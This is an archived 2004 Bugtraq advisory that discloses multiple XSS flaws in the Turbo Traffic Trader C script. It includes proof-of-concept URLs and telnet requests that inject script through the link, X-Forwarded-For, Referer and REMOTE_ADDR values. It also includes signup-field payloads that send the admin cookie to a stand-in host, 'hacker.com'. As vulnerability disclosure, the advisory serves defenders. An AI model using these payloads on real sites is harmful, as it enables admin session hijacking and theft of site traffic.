[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple TTT-C XSS vulnerabilities
From: Kaloyan Georgiev <spam () icefire ! org>
Date: 2004-05-17 2:46:11
Message-ID: 20040517024611.2321.qmail () www ! securityfocus ! com
[Download RAW message or body]
--------------------------------------------------------
Subject: Multiple TTT-C (Turbo Traffic Trader C) XSS vulnerabilityes.
Author: Kaloyan Olegov Georgiev (ICEFIRE)
Package name: Turbo Traffic Trader C (TTT-C or TTT3)
Sumary: Multiple XSS issues
Date: 2004-05-16
Affected versions: Latest stable TTT version, all betas and release candidates.
Product site: http://www.turbotraffictrader.com/
Vendor response: nobody cares about you or what you have to say, it's really sad you \
could be a wealthy person if you just had morals. Dude, I don't care if you post to \
the boards, I really don't , people are sick of you, everyone that does not know what \
a thief you are will know after I post, I am ready to take legal action against you. \
Need I say more about this response? Extended info: \
http://www.icefire.org/security/ttt-bugreport.txt
--------------------------------------------------------
Package description (from vendor's site):
The World's Most Advanced Free C Traffic Trading Script
Turbo Traffic Trader C 1.0 is an advanced trading script written entirely in \
C/Sqlite, it offers you advanced features that cannot be found in other FREE scripts.
Problem description:
TTT-C does not sanityze variables. This leads to very easy XSS scripting and in some \
cases complete site traffic hijacking.
Solution:
Don't use TTT-C as the vendor seems not to care too much about all these issues.
Msg the vendor: The best option is to use the CjOverkill like or similar string \
replacement routine for <,>,% and so on characters.
Problem deep description with proof of concept code:
As no one variable is sanityzed anyone can insert HTML code into the admin interface. \
On sites with trades signup enabled there is also possible to hijack all the admin \
interface and steal the admin cookie in order to login and takeover the script. Also \
it could be used to steal all the traffic a given site has.
Links panel XSS proof of concept code:
Link variable is not sanityzed and could be a valid XSS
Example:
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>
IP Logs panel XSS proof of concept code:
IP could be null
IP could be a valid XSS
Proxy is not sanityzed
Proxy could be a valid XSS
Example for proxy:
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
Host: www.vulnerable.com
Example for IP (needs local server access):
export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
./ttt-in will load one bad record for IP
Referer Logs panel XSS proof of concept code:
Referer is not sanityzed, could be a valid XSS
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
Host: www.vulnerable.com
Edit Panel XSS:
See Main because Edit uses exactly the same variables.
Main control panel XSS (take care with this one, the example is a complete takeover):
For that one you must signup for a trade. When you signup as a new trade you need to \
put your site info and url. Insert any HTML code and it will work.
Example:
Site Name = http://www.owned.com"<script>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';</script>
Site URL = http://www.owned.com"<script>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';</script>
Webmaster e-mail = email@something.com"<script>alert('email_inject');</script>
Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>
This one ast could lead to the theft of all the traffic that site has because when \
the site name or domain get into the toplist any visitor of that site will get the \
XSS and will get redirected.
Any other HTML will work, so use your imagination. the examples are quite simple, but \
you still can get the point.
Kaloyan Olegov Georgiev
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic